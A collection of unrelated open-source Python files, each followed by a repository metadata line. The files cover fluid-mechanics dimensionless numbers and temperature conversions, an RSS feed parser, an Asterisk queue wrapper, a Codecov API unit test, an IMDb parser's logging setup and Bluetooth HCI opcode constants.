rhop : float
Particle density, [kg/m^3]
mu : float
Fluid viscosity, [Pa*s]
Returns
-------
Stk : float
Stokes numer, [-]
Notes
-----
Used in droplet impaction or collection studies.
Examples
--------
>>> Stokes_number(V=0.9, Dp=1E-5, D=1E-3, rhop=1000, mu=1E-5)
0.5
References
----------
.. [1] Rhodes, Martin J. Introduction to Particle Technology. Wiley, 2013.
.. [2] Al-Dughaither, Abdullah S., Ahmed A. Ibrahim, and Waheed A.
Al-Masry. "Investigating Droplet Separation Efficiency in Wire-Mesh Mist
Eliminators in Bubble Column." Journal of Saudi Chemical Society 14, no.
4 (October 1, 2010): 331-39. https://doi.org/10.1016/j.jscs.2010.04.001.
'''
return rhop*V*(Dp*Dp)/(18.0*mu*D)
def Capillary(V, mu, sigma):
r'''Calculates Capillary number `Ca` for a characteristic velocity `V`,
viscosity `mu`, and surface tension `sigma`.
.. math::
Ca = \frac{V \mu}{\sigma}
Parameters
----------
V : float
Characteristic velocity, [m/s]
mu : float
Dynamic viscosity, [Pa*s]
sigma : float
Surface tension, [N/m]
Returns
-------
Ca : float
Capillary number, [-]
Notes
-----
Used in porous media calculations and film flow calculations.
Surface tension may gas-liquid, or liquid-liquid.
.. math::
Ca = \frac{\text{Viscous forces}}
{\text{Surface forces}}
Examples
--------
>>> Capillary(1.2, 0.01, .1)
0.12
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Kundu, Pijush K., Ira M. Cohen, and David R. Dowling. Fluid
Mechanics. Academic Press, 2012.
'''
return V*mu/sigma
def Archimedes(L, rhof, rhop, mu, g=g):
r'''Calculates Archimedes number, `Ar`, for a fluid and particle with the
given densities, characteristic length, viscosity, and gravity
(usually diameter of particle).
.. math::
Ar = \frac{L^3 \rho_f(\rho_p-\rho_f)g}{\mu^2}
Parameters
----------
L : float
Characteristic length, typically particle diameter [m]
rhof : float
Density of fluid, [kg/m^3]
rhop : float
Density of particle, [kg/m^3]
mu : float
Viscosity of fluid, [N/m]
g : float, optional
Acceleration due to gravity, [m/s^2]
Returns
-------
Ar : float
Archimedes number []
Notes
-----
Used in fluid-particle interaction calculations.
.. math::
Ar = \frac{\text{Gravitational force}}{\text{Viscous force}}
Examples
--------
>>> Archimedes(0.002, 2., 3000, 1E-3)
470.4053872
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return L*L*L*rhof*(rhop-rhof)*g/(mu*mu)
def Ohnesorge(L, rho, mu, sigma):
r'''Calculates Ohnesorge number, `Oh`, for a fluid with the given
characteristic length, density, viscosity, and surface tension.
.. math::
\text{Oh} = \frac{\mu}{\sqrt{\rho \sigma L }}
Parameters
----------
L : float
Characteristic length [m]
rho : float
Density of fluid, [kg/m^3]
mu : float
Viscosity of fluid, [Pa*s]
sigma : float
Surface tension, [N/m]
Returns
-------
Oh : float
Ohnesorge number []
Notes
-----
Often used in spray calculations. Sometimes given the symbol Z.
.. math::
Oh = \frac{\sqrt{\text{We}}}{\text{Re}}= \frac{\text{viscous forces}}
{\sqrt{\text{Inertia}\cdot\text{Surface tension}} }
Examples
--------
>>> Ohnesorge(1E-4, 1000., 1E-3, 1E-1)
0.01
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
'''
return mu/sqrt(L*rho*sigma)
def Suratman(L, rho, mu, sigma):
r'''Calculates Suratman number, `Su`, for a fluid with the given
characteristic length, density, viscosity, and surface tension.
.. math::
\text{Su} = \frac{\rho\sigma L}{\mu^2}
Parameters
----------
L : float
Characteristic length [m]
rho : float
Density of fluid, [kg/m^3]
mu : float
Viscosity of fluid, [Pa*s]
sigma : float
Surface tension, [N/m]
Returns
-------
Su : float
Suratman number []
Notes
-----
Also known as Laplace number. Used in two-phase flow, especially the
bubbly-slug regime. No confusion regarding the definition of this group
has been observed.
.. math::
\text{Su} = \frac{\text{Re}^2}{\text{We}} =\frac{\text{Inertia}\cdot
\text{Surface tension} }{\text{(viscous forces)}^2}
The oldest reference to this group found by the author is in 1963, from
[2]_.
Examples
--------
>>> Suratman(1E-4, 1000., 1E-3, 1E-1)
10000.0
References
----------
.. [1] Sen, Nilava. "Suratman Number in Bubble-to-Slug Flow Pattern
Transition under Microgravity." Acta Astronautica 65, no. 3-4 (August
2009): 423-28. doi:10.1016/j.actaastro.2009.02.013.
.. [2] Catchpole, John P., and George. Fulford. "DIMENSIONLESS GROUPS."
Industrial & Engineering Chemistry 58, no. 3 (March 1, 1966): 46-60.
doi:10.1021/ie50675a012.
'''
return rho*sigma*L/(mu*mu)
def Hagen(Re, fd):
r'''Calculates Hagen number, `Hg`, for a fluid with the given
Reynolds number and friction factor.
.. math::
\text{Hg} = \frac{f_d}{2} Re^2 = \frac{1}{\rho}
\frac{\Delta P}{\Delta z} \frac{D^3}{\nu^2}
= \frac{\rho\Delta P D^3}{\mu^2 \Delta z}
Parameters
----------
Re : float
Reynolds number [-]
fd : float, optional
Darcy friction factor, [-]
Returns
-------
Hg : float
Hagen number, [-]
Notes
-----
Introduced in [1]_; further use of it is mostly of the correlations
introduced in [1]_.
Notable for use use in correlations, because it does not have any
dependence on velocity.
This expression is useful when designing backwards with a pressure drop
spec already known.
Examples
--------
Example from [3]_:
>>> Hagen(Re=2610, fd=1.935235)
6591507.17175
References
----------
.. [1] Martin, Holger. "The Generalized Lévêque Equation and Its Practical
Use for the Prediction of Heat and Mass Transfer Rates from Pressure
Drop." Chemical Engineering Science, Jean-Claude Charpentier
Festschrift Issue, 57, no. 16 (August 1, 2002): 3217-23.
https://doi.org/10.1016/S0009-2509(02)00194-X.
.. [2] Shah, Ramesh K., and Dusan P. Sekulic. Fundamentals of Heat
Exchanger Design. 1st edition. Hoboken, NJ: Wiley, 2002.
.. [3] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
Berlin; New York:: Springer, 2010.
'''
return 0.5*fd*Re*Re
def Bejan_L(dP, L, mu, alpha):
r'''Calculates Bejan number of a length or `Be_L` for a fluid with the
given parameters flowing over a characteristic length `L` and experiencing
a pressure drop `dP`.
.. math::
Be_L = \frac{\Delta P L^2}{\mu \alpha}
Parameters
----------
dP : float
Pressure drop, [Pa]
L : float
Characteristic length, [m]
mu : float, optional
Dynamic viscosity, [Pa*s]
alpha : float
Thermal diffusivity, [m^2/s]
Returns
-------
Be_L : float
Bejan number with respect to length []
Notes
-----
Termed a dimensionless number by someone in 1988.
Examples
--------
>>> Bejan_L(1E4, 1, 1E-3, 1E-6)
10000000000000.0
References
----------
.. [1] Awad, M. M. "The Science and the History of the Two Bejan Numbers."
International Journal of Heat and Mass Transfer 94 (March 2016): 101-3.
doi:10.1016/j.ijheatmasstransfer.2015.11.073.
.. [2] Bejan, Adrian. Convection Heat Transfer. 4E. Hoboken, New Jersey:
Wiley, 2013.
'''
return dP*L*L/(alpha*mu)
def Bejan_p(dP, K, mu, alpha):
r'''Calculates Bejan number of a permeability or `Be_p` for a fluid with
the given parameters and a permeability `K` experiencing a pressure drop
`dP`.
.. math::
Be_p = \frac{\Delta P K}{\mu \alpha}
Parameters
----------
dP : float
Pressure drop, [Pa]
K : float
Permeability, [m^2]
mu : float, optional
Dynamic viscosity, [Pa*s]
alpha : float
Thermal diffusivity, [m^2/s]
Returns
-------
Be_p : float
Bejan number with respect to pore characteristics []
Notes
-----
Termed a dimensionless number by someone in 1988.
Examples
--------
>>> Bejan_p(1E4, 1, 1E-3, 1E-6)
10000000000000.0
References
----------
.. [1] Awad, M. M. "The Science and the History of the Two Bejan Numbers."
International Journal of Heat and Mass Transfer 94 (March 2016): 101-3.
doi:10.1016/j.ijheatmasstransfer.2015.11.073.
.. [2] Bejan, Adrian. Convection Heat Transfer. 4E. Hoboken, New Jersey:
Wiley, 2013.
'''
return dP*K/(alpha*mu)
def Boiling(G, q, Hvap):
r'''Calculates Boiling number or `Bg` using heat flux, two-phase mass flux,
and heat of vaporization of the fluid flowing. Used in two-phase heat
transfer calculations.
.. math::
\text{Bg} = \frac{q}{G_{tp} \Delta H_{vap}}
Parameters
----------
G : float
Two-phase mass flux in a channel (combined liquid and vapor) [kg/m^2/s]
q : float
Heat flux [W/m^2]
Hvap : float
Heat of vaporization of the fluid [J/kg]
Returns
-------
Bg : float
Boiling number [-]
Notes
-----
Most often uses the symbol `Bo` instead of `Bg`, but this conflicts with
Bond number.
.. math::
\text{Bg} = \frac{\text{mass liquid evaporated / area heat transfer
surface}}{\text{mass flow rate fluid / flow cross sectional area}}
First defined in [4]_, though not named.
Examples
--------
>>> Boiling(300, 3000, 800000)
1.25e-05
References
----------
.. [1] Winterton, Richard H.S. BOILING NUMBER. Thermopedia. Hemisphere,
2011. 10.1615/AtoZ.b.boiling_number
.. [2] Collier, John G., and John R. Thome. Convective Boiling and
Condensation. 3rd edition. Clarendon Press, 1996.
.. [3] Stephan, Karl. Heat Transfer in Condensation and Boiling. Translated
by C. V. Green.. 1992 edition. Berlin; New York: Springer, 2013.
.. [4] W. F. Davidson, P. H. Hardie, C. G. R. Humphreys, A. A. Markson,
A. R. Mumford and T. Ravese "Studies of heat transmission through boiler
tubing at pressures from 500 to 3300 pounds" Trans. ASME, Vol. 65, 9,
February 1943, pp. 553-591.
'''
return q/(G*Hvap)
def Dean(Re, Di, D):
r'''Calculates Dean number, `De`, for a fluid with the Reynolds number `Re`,
inner diameter `Di`, and a secondary diameter `D`. `D` may be the
diameter of curvature, the diameter of a spiral, or some other dimension.
.. math::
\text{De} = \sqrt{\frac{D_i}{D}} \text{Re} = \sqrt{\frac{D_i}{D}}
\frac{\rho v D}{\mu}
Parameters
----------
Re : float
Reynolds number []
Di : float
Inner diameter []
D : float
Diameter of curvature or outer spiral or other dimension []
Returns
-------
De : float
Dean number [-]
Notes
-----
Used in flow in curved geometry.
.. math::
\text{De} = \frac{\sqrt{\text{centripetal forces}\cdot
\text{inertial forces}}}{\text{viscous forces}}
Examples
--------
>>> Dean(10000, 0.1, 0.4)
5000.0
References
----------
.. [1] Catchpole, John P., and George. Fulford. "DIMENSIONLESS GROUPS."
Industrial & Engineering Chemistry 58, no. 3 (March 1, 1966): 46-60.
doi:10.1021/ie50675a012.
'''
return sqrt(Di/D)*Re
def relative_roughness(D, roughness=1.52e-06):
r'''Calculates relative roughness `eD` using a diameter and the roughness
of the material of the wall. Default roughness is that of steel.
.. math::
eD=\frac{\epsilon}{D}
Parameters
----------
D : float
Diameter of pipe, [m]
roughness : float, optional
Roughness of pipe wall [m]
Returns
-------
eD : float
Relative Roughness, [-]
Examples
--------
>>> relative_roughness(0.5, 1E-4)
0.0002
References
----------
.. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
.. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
return roughness/D
### Misc utilities
def nu_mu_converter(rho, mu=None, nu=None):
r'''Calculates either kinematic or dynamic viscosity, depending on inputs.
Used when one type of viscosity is known as well as density, to obtain
the other type. Raises an error if both types of viscosity or neither type
of viscosity is provided.
.. math::
\nu = \frac{\mu}{\rho}
.. math::
\mu = \nu\rho
Parameters
----------
rho : float
Density, [kg/m^3]
mu : float, optional
Dynamic viscosity, [Pa*s]
nu : float, optional
Kinematic viscosity, [m^2/s]
Returns
-------
mu or nu : float
Dynamic viscosity, Pa*s or Kinematic viscosity, m^2/s
Examples
--------
>>> nu_mu_converter(998., nu=1.0E-6)
0.000998
References
----------
.. [1] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
Applications. Boston: McGraw Hill Higher Education, 2006.
'''
if (nu is not None and mu is not None) or rho is None or (nu is None and mu is None):
raise ValueError('Inputs must be rho and one of mu and nu.')
if mu is not None:
return mu/rho
else:
return nu*rho
def gravity(latitude, H):
r'''Calculates local acceleration due to gravity `g` according to [1]_.
Uses latitude and height to calculate `g`.
.. math::
g = 9.780356(1 + 0.0052885\sin^2\phi - 0.0000059^22\phi)
- 3.086\times 10^{-6} H
Parameters
----------
latitude : float
Degrees, [degrees]
H : float
Height above earth's surface [m]
Returns
-------
g : float
Acceleration due to gravity, [m/s^2]
Notes
-----
Better models, such as EGM2008 exist.
Examples
--------
>>> gravity(55, 1E4)
9.784151976863571
References
----------
.. [1] Haynes, W.M., Thomas J. Bruno, and David R. Lide. CRC Handbook of
Chemistry and Physics. [Boca Raton, FL]: CRC press, 2014.
'''
lat = latitude*pi/180
g = 9.780356*(1+0.0052885*sin(lat)**2 -0.0000059*sin(2*lat)**2)-3.086E-6*H
return g
### Friction loss conversion functions
def K_from_f(fd, L, D):
r'''Calculates loss coefficient, K, for a given section of pipe
at a specified friction factor.
.. math::
K = f_dL/D
Parameters
----------
fd : float
friction factor of pipe, []
L : float
Length of pipe, [m]
D : float
Inner diameter of pipe, [m]
Returns
-------
K : float
Loss coefficient, []
Notes
-----
For fittings with a specified L/D ratio, use D = 1 and set L to
specified L/D ratio.
Examples
--------
>>> K_from_f(fd=0.018, L=100., D=.3)
6.0
'''
return fd*L/D
def f_from_K(K, L, D):
r'''Calculates friction factor, `fd`, from a loss coefficient, K,
for a given section of pipe.
.. math::
f_d = \frac{K D}{L}
Parameters
----------
K : float
Loss coefficient, []
L : float
Length of pipe, [m]
D : float
Inner diameter of pipe, [m]
Returns
-------
fd : float
Darcy friction factor of pipe, [-]
Notes
-----
This can be useful to blend fittings at specific locations in a pipe into
a pressure drop which is evenly distributed along a pipe.
Examples
--------
>>> f_from_K(K=0.6, L=100., D=.3)
0.0018
'''
return K*D/L
def K_from_L_equiv(L_D, fd=0.015):
r'''Calculates loss coefficient, for a given equivalent length (L/D).
.. math::
K = f_d \frac{L}{D}
Parameters
----------
L_D : float
Length over diameter, []
fd : float, optional
Darcy friction factor, [-]
Returns
-------
K : float
Loss coefficient, []
Notes
-----
Almost identical to `K_from_f`, but with a default friction factor for
fully turbulent flow in steel pipes.
Examples
--------
>>> K_from_L_equiv(240)
3.5999999999999996
'''
return fd*L_D
def L_equiv_from_K(K, fd=0.015):
r'''Calculates equivalent length of pipe (L/D), for a given loss
coefficient.
.. math::
\frac{L}{D} = \frac{K}{f_d}
Parameters
----------
K : float
Loss coefficient, [-]
fd : float, optional
Darcy friction factor, [-]
Returns
-------
L_D : float
Length over diameter, [-]
Notes
-----
Assumes a default friction factor for fully turbulent flow in steel pipes.
Examples
--------
>>> L_equiv_from_K(3.6)
240.00000000000003
'''
return K/fd
def L_from_K(K, D, fd=0.015):
r'''Calculates the length of straight pipe at a specified friction factor
required to produce a given loss coefficient `K`.
.. math::
L = \frac{K D}{f_d}
Parameters
----------
K : float
Loss coefficient, []
D : float
Inner diameter of pipe, [m]
fd : float
friction factor of pipe, []
Returns
-------
L : float
Length of pipe, [m]
Examples
--------
>>> L_from_K(K=6, D=.3, fd=0.018)
100.0
'''
return K*D/fd
def dP_from_K(K, rho, V):
r'''Calculates pressure drop, for a given loss coefficient,
at a specified density and velocity.
.. math::
dP = 0.5K\rho V^2
Parameters
----------
K : float
Loss coefficient, []
rho : float
Density of fluid, [kg/m^3]
V : float
Velocity of fluid in pipe, [m/s]
Returns
-------
dP : float
Pressure drop, [Pa]
Notes
-----
Loss coefficient `K` is usually the sum of several factors, including
the friction factor.
Examples
--------
>>> dP_from_K(K=10, rho=1000, V=3)
45000.0
'''
return K*0.5*rho*V*V
def head_from_K(K, V, g=g):
r'''Calculates head loss, for a given loss coefficient,
at a specified velocity.
.. math::
\text{head} = \frac{K V^2}{2g}
Parameters
----------
K : float
Loss coefficient, []
V : float
Velocity of fluid in pipe, [m/s]
g : float, optional
Acceleration due to gravity, [m/s^2]
Returns
-------
head : float
Head loss, [m]
Notes
-----
Loss coefficient `K` is usually the sum of several factors, including
the friction factor.
Examples
--------
>>> head_from_K(K=10, V=1.5)
1.1471807396001694
'''
return K*0.5*V*V/g
def head_from_P(P, rho, g=g):
r'''Calculates head for a fluid of specified density at specified
pressure.
.. math::
\text{head} = {P\over{\rho g}}
Parameters
----------
P : float
Pressure fluid in pipe, [Pa]
rho : float
Density of fluid, [kg/m^3]
g : float, optional
Acceleration due to gravity, [m/s^2]
Returns
-------
head : float
Head, [m]
Notes
-----
By definition. Head varies with location, inversely proportional to the
increase in gravitational constant.
Examples
--------
>>> head_from_P(P=98066.5, rho=1000)
10.000000000000002
'''
return P/rho/g
def P_from_head(head, rho, g=g):
r'''Calculates head for a fluid of specified density at specified
pressure.
.. math::
P = \rho g \cdot \text{head}
Parameters
----------
head : float
Head, [m]
rho : float
Density of fluid, [kg/m^3]
g : float, optional
Acceleration due to gravity, [m/s^2]
Returns
-------
P : float
Pressure fluid in pipe, [Pa]
Notes
-----
Examples
--------
>>> P_from_head(head=5., rho=800.)
39226.6
'''
return head*rho*g
### Synonyms
alpha = thermal_diffusivity # synonym for thermal diffusivity
Pr = Prandtl # Synonym
# temperature in kelvin
zero_Celsius = 273.15
degree_Fahrenheit = 1.0/1.8 # only for differences
def C2K(C):
"""Convert Celsius to Kelvin.
Parameters
----------
C : float
Celsius temperature to be converted, [degC]
Returns
-------
K : float
Equivalent Kelvin temperature, [K]
Notes
-----
Computes ``K = C + zero_Celsius`` where `zero_Celsius` = 273.15, i.e.,
(the absolute value of) temperature "absolute zero" as measured in Celsius.
Examples
--------
>>> C2K(-40)
233.14999999999998
"""
return C + zero_Celsius
def K2C(K):
"""Convert Kelvin to Celsius.
Parameters
----------
K : float
Kelvin temperature to be converted.
Returns
-------
C : float
Equivalent Celsius temperature.
Notes
-----
Computes ``C = K - zero_Celsius`` where `zero_Celsius` = 273.15, i.e.,
(the absolute value of) temperature "absolute zero" as measured in Celsius.
Examples
--------
>>> K2C(233.15)
-39.99999999999997
"""
return K - zero_Celsius
def F2C(F):
"""Convert Fahrenheit to Celsius.
Parameters
----------
F : float
Fahrenheit temperature to be converted.
Returns
-------
C : float
Equivalent Celsius temperature.
Notes
-----
Computes ``C = (F - 32) / 1.8``.
Examples
--------
>>> F2C(-40.0)
-40.0
"""
return (F - 32.0) / 1.8
def C2F(C):
"""Convert Celsius to Fahrenheit.
Parameters
----------
C : float
Celsius temperature to be converted.
Returns
-------
F : float
Equivalent Fahrenheit temperature.
Notes
-----
Computes ``F = 1.8 * C + 32``.
Examples
--------
>>> C2F(-40.0)
-40.0
"""
return 1.8*C + 32.0
def F2K(F):
"""Convert Fahrenheit to Kelvin.
Parameters
----------
F : float
Fahrenheit temperature to be converted.
Returns
-------
K : float
Equivalent Kelvin temperature.
Notes
-----
Computes ``K = (F - 32)/1.8 + zero_Celsius`` where `zero_Celsius` =
273.15, i.e., (the absolute value of) temperature "absolute zero" as
measured in Celsius.
Examples
--------
>>> F2K(-40)
233.14999999999998
"""
return (F - 32.0)/1.8 + zero_Celsius
def K2F(K):
"""Convert Kelvin to Fahrenheit.
Parameters
----------
K : float
Kelvin temperature to be converted.
Returns
-------
F : float
Equivalent Fahrenheit temperature.
Notes
-----
Computes ``F = 1.8 * (K - zero_Celsius) + 32`` where `zero_Celsius` =
273.15, i.e., (the absolute value of) temperature "absolute zero" as
measured in Celsius.
Examples
--------
>>> K2F(233.15)
-39.99999999999996
"""
return 1.8*(K - zero_Celsius) + 32.0
def C2R(C):
"""Convert Celsius to Rankine.
Parameters
----------
C : float
Celsius temperature to be converted.
Returns
-------
Ra : float
Equivalent Rankine temperature.
Notes
-----
Computes ``Ra = 1.8 * (C + zero_Celsius)`` where `zero_Celsius` = 273.15,
i.e., (the absolute value of) temperature "absolute zero" as measured in
Celsius.
Examples
--------
>>> C2R(-40)
419.66999999999996
"""
return 1.8 * (C + zero_Celsius)
def K2R(K):
"""Convert Kelvin to Rankine.
Parameters
----------
K : float
Kelvin temperature to be converted.
Returns
-------
Ra : float
Equivalent Rankine temperature.
Notes
-----
Computes ``Ra = 1.8 * K``.
Examples
--------
>>> K2R(273.15)
491.66999999999996
"""
return 1.8 * K
def F2R(F):
"""Convert Fahrenheit to Rankine.
Parameters
----------
F : float
Fahrenheit temperature to be converted.
Returns
-------
Ra : float
Equivalent Rankine temperature.
Notes
-----
Computes ``Ra = F - 32 + 1.8 * zero_Celsius`` where `zero_Celsius` = 273.15,
i.e., (the absolute value of) temperature "absolute zero" as measured in
Celsius.
Examples
--------
>>> F2R(100)
559.67
"""
return F - 32.0 + 1.8 * zero_Celsius
def R2C(Ra):
"""Convert Rankine to Celsius.
Parameters
----------
Ra : float
Rankine temperature to be converted.
Returns
-------
C : float
Equivalent Celsius temperature.
Notes
-----
Computes ``C = Ra / 1.8 - zero_Celsius`` where `zero_Celsius` = 273.15,
i.e., (the absolute value of) temperature "absolute zero" as measured in
Celsius.
Examples
--------
>>> R2C(459.67)
-17.777777777777743
"""
return Ra / 1.8 - zero_Celsius
def R2K(Ra):
"""Convert Rankine to Kelvin.
Parameters
----------
Ra : float
Rankine temperature to be converted.
Returns
-------
K : float
Equivalent Kelvin temperature.
Notes
-----
Computes ``K = Ra / 1.8``.
Examples
--------
>>> R2K(491.67)
273.15
"""
return Ra / 1.8
def R2F(Ra):
"""Convert Rankine to Fahrenheit.
Parameters
----------
Ra : float
Rankine temperature to be converted.
Returns
-------
F : float
Equivalent Fahrenheit temperature.
Notes
-----
Computes ``F = Ra + 32 - 1.8 * zero_Celsius`` where `zero_Celsius` = 273.15,
i.e., (the absolute value of) temperature "absolute zero" as measured in
Celsius.
Examples
--------
>>> R2F(491.67)
32.00000000000006
"""
return Ra - 1.8*zero_Celsius + 32.0
def Engauge_2d_parser(lines, flat=False):
"""Not exposed function to read a 2D file generated by engauge-digitizer;
for curve fitting."""
z_values = []
x_lists = []
y_lists = []
working_xs = []
working_ys = []
new_curve = True
for line in lines:
if line.strip() == '':
new_curve = True
elif new_curve:
z = float(line.split(',')[1])
z_values.append(z)
if working_xs and working_ys:
x_lists.append(working_xs)
y_lists.append(working_ys)
working_xs = []
working_ys = []
new_curve = False
else:
x, y = [float(i) for i in line.strip().split(',')]
working_xs.append(x)
working_ys.append(y)
x_lists.append(working_xs)
y_lists.append(working_ys)
if flat:
all_zs = []
all_xs = []
all_ys = []
for z, xs, ys in zip(z_values, x_lists, y_lists):
for x, y in zip(xs, ys):
all_zs.append(z)
all_xs.append(x)
all_ys.append(y)
return all_zs, all_xs, all_ys
return z_values, x_lists, y_lists
| CalebBell/fluids | fluids/core.py | Python | mit | 78,285 |
def extractNekocchiblogWordpressCom(item):
'''
Parser for 'nekocchiblog.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
| fake-name/ReadableWebProxy | WebMirror/management/rss_parser_funcs/feed_parse_extractNekocchiblogWordpressCom.py | Python | bsd-3-clause | 564 |
# -*- coding: utf-8 -*-
from schedulestorage import Storage
from dbasterisk import DbAsterisk
from scheduling import choosers, Scheduling
import datetime
from yamlns import namespace as ns
class PbxAsterisk(object):
def __init__(self, path, *dbargs, **dbkwd):
self.storage = Storage(path)
self.db = DbAsterisk(*dbargs, **dbkwd)
def _currentSched(self, when=None):
when = when or datetime.datetime.now()
week, dow, time = choosers(when)
try:
yaml=self.storage.load(week)
except KeyError:
return None
return Scheduling(yaml)
def setSchedQueue(self, when):
sched = self._currentSched(when)
if sched is None:
self.db.setQueue('somenergia', [])
return
week, dow, time = choosers(when)
self.db.setQueue('somenergia', [
sched.extension(name)
for name in sched.peekQueue(dow, time)
])
def currentQueue(self):
sched = self._currentSched()
if sched is None:
return []
return [
ns(
key=sched.extensionToName(extension),
paused=bool(paused),
)
for extension, paused
in self.db.queue('somenergia')
]
def pause(self, name):
sched = self._currentSched()
self.db.pause('somenergia', sched.extension(name))
def resume(self, name):
sched = self._currentSched()
self.db.resume('somenergia', sched.extension(name))
def addLine(self, name):
sched = self._currentSched()
self.db.add('somenergia', sched.extension(name))
# vim: ts=4 sw=4 et
| Som-Energia/somenergia-phonetimetable | tomatic/pbxasterisk.py | Python | gpl-3.0 | 1,702 |
"""Tests for Codecov API interface."""
from agithub import base as agithub_base
import unittest
from unittest import mock
import env
from apis import codecov
class TestCodecovApi(unittest.TestCase):
def setUp(self):
super(TestCodecovApi, self).setUp()
mock.patch.object(
env, 'get', side_effect={
'GITHUB_REPO': '__repo__',
}.get).start()
self.mock_request = mock.patch.object(
agithub_base.Client, 'request', autospec=True).start()
self.addCleanup(mock.patch.stopall)
self.codecov_api = codecov.CodecovApi()
def testGetAbsoluteCoverageForHead(self):
self.mock_request.return_value = (200, {
'commit': {
'totals': {
'c': '13.37'
}
}
})
coverage = self.codecov_api.get_absolute_coverage()
self.assertEqual(coverage, 13.37)
self.mock_request.assert_called_once_with(
self.codecov_api.client, 'GET', '/__repo__/branch/main?limit=1',
mock.ANY, mock.ANY)
def testGetAbsoluteCoverageForCommit(self):
self.mock_request.return_value = (200, {
'commit': {
'totals': {
'c': '13.37'
}
}
})
coverage = self.codecov_api.get_absolute_coverage('test_commit_hash')
self.assertEqual(coverage, 13.37)
self.mock_request.assert_called_once_with(
self.codecov_api.client, 'GET',
'/__repo__/commits/test_commit_hash?limit=1', mock.ANY, mock.ANY)
def testGetAbsoluteCoverageError(self):
self.mock_request.return_value = (404, {'error': {'reason': 'Not found.'}})
with self.assertRaises(
codecov.CodecovApiError,
msg='Codecov API Exception HTTP 404): Not found.'):
self.codecov_api.get_absolute_coverage()
| ampproject/amp-github-apps | project-metrics/metrics_service/apis/codecov_test.py | Python | apache-2.0 | 1,772 |
"""
This file is part of imdb-data-parser.
imdb-data-parser is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
imdb-data-parser is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with imdb-data-parser. If not, see <http://www.gnu.org/licenses/>.
"""
import logging
import os.path
def initialize_logger(preferences_map):
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# create console handler and set level to info
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
formatter = logging.Formatter("%(levelname)s - %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
# create error file handler and set level to error
ch = logging.FileHandler(os.path.join(preferences_map['output_dir'], "imdbparserError.log"),"w", encoding=None, delay="true")
ch.setLevel(logging.ERROR)
formatter = logging.Formatter("%(levelname)s - %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
# create info file handler and set level to info
ch = logging.FileHandler(os.path.join(preferences_map['output_dir'], "imdbparserAll.log"),"w")
ch.setLevel(logging.INFO)
formatter = logging.Formatter("%(levelname)s - %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch) | dedeler/imdb-data-parser | idp/utils/loggerinitializer.py | Python | gpl-3.0 | 1,740 |
# -*- coding: utf-8 -*-
# pylint: disable=C0111
# pylint: disable=C0302
import uctypes
from micropython import const
from bluetooth_low_energy.protocols.hci import HCI_MAX_PAYLOAD_SIZE
OCF_HAL_GET_FW_BUILD_NUMBER = const(0x0000)
OCF_HAL_WRITE_CONFIG_DATA = const(0x000C)
OCF_HAL_READ_CONFIG_DATA = const(0x000D)
OCF_HAL_SET_TX_POWER_LEVEL = const(0x000F)
OCF_HAL_DEVICE_STANDBY = const(0x0013)
OCF_HAL_LE_TX_TEST_PACKET_NUMBER = const(0x0014)
OCF_HAL_TONE_START = const(0x0015)
OCF_HAL_TONE_STOP = const(0x0016)
OCF_HAL_GET_LINK_STATUS = const(0x0017)
OCF_HAL_GET_ANCHOR_PERIOD = const(0x0019)
OCF_UPDATER_START = const(0x0020)
OCF_UPDATER_REBOOT = const(0x0021)
OCF_GET_UPDATER_VERSION = const(0x0022)
OCF_GET_UPDATER_BUFSIZE = const(0x0023)
OCF_UPDATER_ERASE_BLUE_FLAG = const(0x0024)
OCF_UPDATER_RESET_BLUE_FLAG = const(0x0025)
OCF_UPDATER_ERASE_SECTOR = const(0x0026)
OCF_UPDATER_READ_DATA_BLOCK = const(0x0028)
OCF_UPDATER_PROG_DATA_BLOCK = const(0x0027)
OCF_UPDATER_CALC_CRC = const(0x0029)
OCF_UPDATER_HW_VERSION = const(0x002A)
OCF_GAP_SET_NON_DISCOVERABLE = const(0x0081)
OCF_GAP_SET_LIMITED_DISCOVERABLE = const(0x0082)
OCF_GAP_SET_DISCOVERABLE = const(0x0083)
OCF_GAP_SET_DIRECT_CONNECTABLE = const(0x0084)
OCF_GAP_SET_IO_CAPABILITY = const(0x0085)
OCF_GAP_SET_AUTH_REQUIREMENT = const(0x0086)
OCF_GAP_SET_AUTHOR_REQUIREMENT = const(0x0087)
OCF_GAP_PASSKEY_RESPONSE = const(0x0088)
OCF_GAP_AUTHORIZATION_RESPONSE = const(0x0089)
OCF_GAP_INIT = const(0x008A)
OCF_GAP_SET_NON_CONNECTABLE = const(0x008B)
OCF_GAP_SET_UNDIRECTED_CONNECTABLE = const(0x008C)
OCF_GAP_SLAVE_SECURITY_REQUEST = const(0x008D)
OCF_GAP_UPDATE_ADV_DATA = const(0x008E)
